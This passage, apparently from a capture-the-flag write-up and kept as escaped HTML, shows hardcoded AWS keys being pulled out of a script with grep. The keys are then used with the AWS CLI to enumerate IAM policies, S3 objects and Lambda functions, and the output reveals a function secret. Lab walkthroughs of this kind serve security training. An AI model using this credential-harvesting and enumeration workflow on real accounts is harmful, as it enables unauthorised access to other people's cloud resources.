&lt;span class="gp"&gt;$&lt;/span&gt; grep aws_ put_policy.py
&lt;span class="hll"&gt;&lt;span class="go"&gt;aws_access_key_id=&amp;quot;AKIAAIDAYRANYAHGQOHD&amp;quot;,&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;aws_secret_access_key=&amp;quot;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&amp;quot;,&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have the secret access key and the key ID, we can configure it in our
AWS CLI:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws configure
&lt;span class="go"&gt;AWS Access Key ID [None]: AKIAAIDAYRANYAHGQOHD&lt;/span&gt;
&lt;span class="go"&gt;AWS Secret Access Key [None]: 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&lt;/span&gt;
&lt;span class="go"&gt;Default region name [None]: us-east-1&lt;/span&gt;
&lt;span class="go"&gt;Default output format [None]:&lt;/span&gt;
&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws sts get-caller-identity
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;UserId&amp;quot;: &amp;quot;AIDAJNIAAQYHIAAHDDRA&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Account&amp;quot;: &amp;quot;602123424321&amp;quot;,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;    &amp;quot;Arn&amp;quot;: &amp;quot;arn:aws:iam::602123424321:user/haug&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Managed (think: shared) policies can be attached to multiple users. Use the AWS CLI to find any policies attached to your user.
The aws iam command to list attached user policies can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
Hint: it is NOT list-user-policies.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We know from our previous command that our username is &lt;code&gt;haug&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws iam list-attached-user-policies --user-name haug
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;AttachedPolicies&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;PolicyName&amp;quot;: &amp;quot;TIER1_READONLY_POLICY&amp;quot;,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;            &amp;quot;PolicyArn&amp;quot;: &amp;quot;arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;    ],&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;IsTruncated&amp;quot;: false&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws iam get-policy --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Policy&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;PolicyName&amp;quot;: &amp;quot;TIER1_READONLY_POLICY&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;PolicyId&amp;quot;: &amp;quot;ANPAYYOROBUERT7TGKUHA&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Arn&amp;quot;: &amp;quot;arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Path&amp;quot;: &amp;quot;/&amp;quot;,&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;        &amp;quot;DefaultVersionId&amp;quot;: &amp;quot;v1&amp;quot;,&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;        &amp;quot;AttachmentCount&amp;quot;: 11,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;PermissionsBoundaryUsageCount&amp;quot;: 0,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;IsAttachable&amp;quot;: true,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Description&amp;quot;: &amp;quot;Policy for tier 1 accounts to have limited read only access to certain resources in IAM, S3, and LAMBDA.&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;CreateDate&amp;quot;: &amp;quot;2022-06-21 22:02:30+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;UpdateDate&amp;quot;: &amp;quot;2022-06-21 22:10:29+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Tags&amp;quot;: []&lt;/span&gt;
&lt;span class="go"&gt;    }&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Attached policies can have multiple versions. View the default version of this policy.
The aws iam command to get a policy version can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We know from our previous command that the default version is &lt;code&gt;v1&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws iam get-policy-version --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY --version-id v1
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;PolicyVersion&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;Document&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Version&amp;quot;: &amp;quot;2012-10-17&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Statement&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Effect&amp;quot;: &amp;quot;Allow&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Action&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;lambda:ListFunctions&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;lambda:GetFunctionUrlConfig&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                    ],&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Resource&amp;quot;: &amp;quot;*&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                },&lt;/span&gt;
&lt;span class="go"&gt;                {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Effect&amp;quot;: &amp;quot;Allow&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Action&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;iam:GetUserPolicy&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;iam:ListUserPolicies&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;iam:ListAttachedUserPolicies&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                    ],&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Resource&amp;quot;: &amp;quot;arn:aws:iam::602123424321:user/${aws:username}&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                },&lt;/span&gt;
&lt;span class="go"&gt;                {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Effect&amp;quot;: &amp;quot;Allow&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Action&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;iam:GetPolicy&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;iam:GetPolicyVersion&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                    ],&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Resource&amp;quot;: &amp;quot;arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                },&lt;/span&gt;
&lt;span class="go"&gt;                {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Effect&amp;quot;: &amp;quot;Deny&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Principal&amp;quot;: &amp;quot;*&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Action&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;s3:GetObject&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;lambda:Invoke*&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                    ],&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Resource&amp;quot;: &amp;quot;*&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                }&lt;/span&gt;
&lt;span class="go"&gt;            ]&lt;/span&gt;
&lt;span class="go"&gt;        },&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;VersionId&amp;quot;: &amp;quot;v1&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;IsDefaultVersion&amp;quot;: false,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;CreateDate&amp;quot;: &amp;quot;2022-06-21 22:02:30+00:00&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;    }&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Inline policies are policies that are unique to a particular identity or resource. Use the AWS CLI to list the inline policies associated with your user.
The aws iam command to list user policies can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
Hint: it is NOT list-attached-user-policies.
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws iam list-user-policies --user-name haug
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;PolicyNames&amp;quot;: [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;        &amp;quot;S3Perms&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;    ],&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;IsTruncated&amp;quot;: false&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Now, use the AWS CLI to get the only inline policy for your user.
The aws iam command to get a user policy can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws iam get-user-policy --user-name haug --policy-name S3Perms
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;UserPolicy&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;UserName&amp;quot;: &amp;quot;haug&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;PolicyName&amp;quot;: &amp;quot;S3Perms&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;PolicyDocument&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Version&amp;quot;: &amp;quot;2012-10-17&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Statement&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Effect&amp;quot;: &amp;quot;Allow&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Action&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                        &amp;quot;s3:ListObjects&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                    ],&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Resource&amp;quot;: [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;                        &amp;quot;arn:aws:s3:::smogmachines3&amp;quot;,&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;                        &amp;quot;arn:aws:s3:::smogmachines3/*&amp;quot;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;                    ]&lt;/span&gt;
&lt;span class="go"&gt;                }&lt;/span&gt;
&lt;span class="go"&gt;            ]&lt;/span&gt;
&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;    },&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;IsTruncated&amp;quot;: false&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;The inline user policy named S3Perms disclosed the name of an S3 bucket that you have permissions to list objects.
List those objects!
The aws s3api command to list objects in an s3 bucket can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/index.html
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We know from our previous command that the S3 bucket is named
&lt;code&gt;smogmachines3&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws s3api list-objects --bucket smogmachines3
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;IsTruncated&amp;quot;: false,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Marker&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Contents&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;coal-fired-power-station.jpg&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-23 20:40:44+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;1c70c98bebaf3cff781a8fd3141c2945\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 59312,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        },&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;industry-smog.png&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-23 20:40:47+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;c0abe5cb56b7a33d39e17f430755e615\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 272528,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        },&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;pollution-smoke.jpg&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-23 20:40:43+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;465b675c70d73027e13ffaec1a38beec\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 33064,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        },&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;pollution.jpg&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-23 20:40:45+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;d40d1db228c9a9b544b4c552df712478\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 81775,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        },&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;power-station-smoke.jpg&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-23 20:40:48+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;2d7a8c8b8f5786103769e98afacf57de\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 45264,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        },&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;smog-power-station.jpg&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-23 20:40:46+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;0e69b8d53d97db0db9f7de8663e9ec09\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 32498,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;                    },&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Key&amp;quot;: &amp;quot;smogmachine_lambda_handler_qyJZcqvKOthRMgVrAJqq.py&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-26 16:31:33+00:00&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;ETag&amp;quot;: &amp;quot;\&amp;quot;fd5d6ab630691dfe56a3fc2fcfb68763\&amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Size&amp;quot;: 5823,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;StorageClass&amp;quot;: &amp;quot;STANDARD&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Owner&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;DisplayName&amp;quot;: &amp;quot;grinchum&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;ID&amp;quot;: &amp;quot;15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;    ],&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Name&amp;quot;: &amp;quot;smogmachines3&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Prefix&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;MaxKeys&amp;quot;: 1000,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;EncodingType&amp;quot;: &amp;quot;url&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;The attached user policy provided you several Lambda privileges. Use the AWS CLI to list Lambda functions.
The aws lambda command to list functions can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws lambda list-functions
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Functions&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;        {&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;            &amp;quot;FunctionName&amp;quot;: &amp;quot;smogmachine_lambda&amp;quot;,&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;            &amp;quot;FunctionArn&amp;quot;: &amp;quot;arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Runtime&amp;quot;: &amp;quot;python3.9&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Role&amp;quot;: &amp;quot;arn:aws:iam::602123424321:role/smogmachine_lambda&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Handler&amp;quot;: &amp;quot;handler.lambda_handler&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;CodeSize&amp;quot;: 2126,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Description&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Timeout&amp;quot;: 600,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;MemorySize&amp;quot;: 256,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;LastModified&amp;quot;: &amp;quot;2022-09-07T19:28:23.634+0000&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;CodeSha256&amp;quot;: &amp;quot;GFnsIZfgFNA1JZP3TgTI0tIavOpDLiYlg7oziWbtRsa=&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Version&amp;quot;: &amp;quot;$LATEST&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;VpcConfig&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;SubnetIds&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;subnet-8c80a9cb8b3fa5505&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                ],&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;SecurityGroupIds&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;sg-b51a01f5b4711c95c&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                ],&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;VpcId&amp;quot;: &amp;quot;vpc-85ea8596648f35e00&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            },&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Environment&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;Variables&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;LAMBDASECRET&amp;quot;: &amp;quot;975ceab170d61c75&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;LOCALMNTPOINT&amp;quot;: &amp;quot;/mnt/smogmachine_files&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                }&lt;/span&gt;
&lt;span class="go"&gt;            },&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;TracingConfig&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;Mode&amp;quot;: &amp;quot;PassThrough&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            },&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;RevisionId&amp;quot;: &amp;quot;7e198c3c-d4ea-48dd-9370-e5238e9ce06e&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;FileSystemConfigs&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                {&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;Arn&amp;quot;: &amp;quot;arn:aws:elasticfilesystem:us-east-1:602123424321:access-point/fsap-db3277b03c6e975d2&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;                    &amp;quot;LocalMountPath&amp;quot;: &amp;quot;/mnt/smogmachine_files&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;                }&lt;/span&gt;
&lt;span class="go"&gt;            ],&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;PackageType&amp;quot;: &amp;quot;Zip&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;Architectures&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;x86_64&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;            ],&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;EphemeralStorage&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;                &amp;quot;Size&amp;quot;: 512&lt;/span&gt;
&lt;span class="go"&gt;            }&lt;/span&gt;
&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;    ]&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
